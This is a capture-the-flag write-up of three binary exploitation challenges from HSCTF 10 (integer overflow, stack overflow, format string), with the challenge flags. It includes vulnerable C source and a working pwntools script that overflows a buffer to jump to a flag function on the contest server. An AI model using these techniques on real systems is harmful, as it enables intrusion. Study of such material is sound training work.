Binary exploitation challenges in HSCTF 10
doubler
Looks like need to do integer overflow to perfectly get -100 from a doubled number. The max positive integer is 2147483647. So from there just work backwards to get -100.
Flag: flag{double_or_nothing_406c561}
ed
int flag() {
puts(getenv("FLAG"));
}
int main(int argc, char** argv) {
char input[24];
char filename[24] = "\0";
char buffer[64];
FILE* f = NULL;
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
if (argc > 1) {
strncpy(filename, argv[1], 23);
}
while (1) {
fgets(input, 64, stdin);
input[strcspn(input, "\n")] = 0;
if (input[0] == 'Q') {
return 0;
} else if (input[0] == 'f') {
if (strlen(input) >= 3) {
strcpy(filename, input + 2);
}
if (filename[0] == '\0') {
puts("?");
} else {
puts(filename);
}
} else if (input[0] == 'l') {
if (filename[0] == '\0') {
puts("?");
} else {
if (strchr(filename, '/') != NULL) {
puts("?");
continue;
}
f = fopen(filename, "r");
if (f == NULL) {
puts("?");
continue;
}
while (fgets(buffer, 64, f)) {
printf("%s", buffer);
}
fclose(f);
}
} else {
puts("?");
}
}
}
There is a bufferoverflow where we can return to the flag function:
It crashed, the offset is 40. Quick script on the server gives flag.
from pwn import *
r = remote("ed.hsctf.com", 1337)
flag = p64(0x00000000004011d2)
r.sendline(b"A"*40 + flag)
r.recv()
r.sendline(b"Q")
print(r.recv())
Flag: flag{real_programmers_use_butterflies}
cat
Simple format string bug. I tried to extract the flag using %n$x where n is just positive integers. And decode using cyberchef.
At the 14th element, the flag was done.
Flag: flag{cats_go_meow}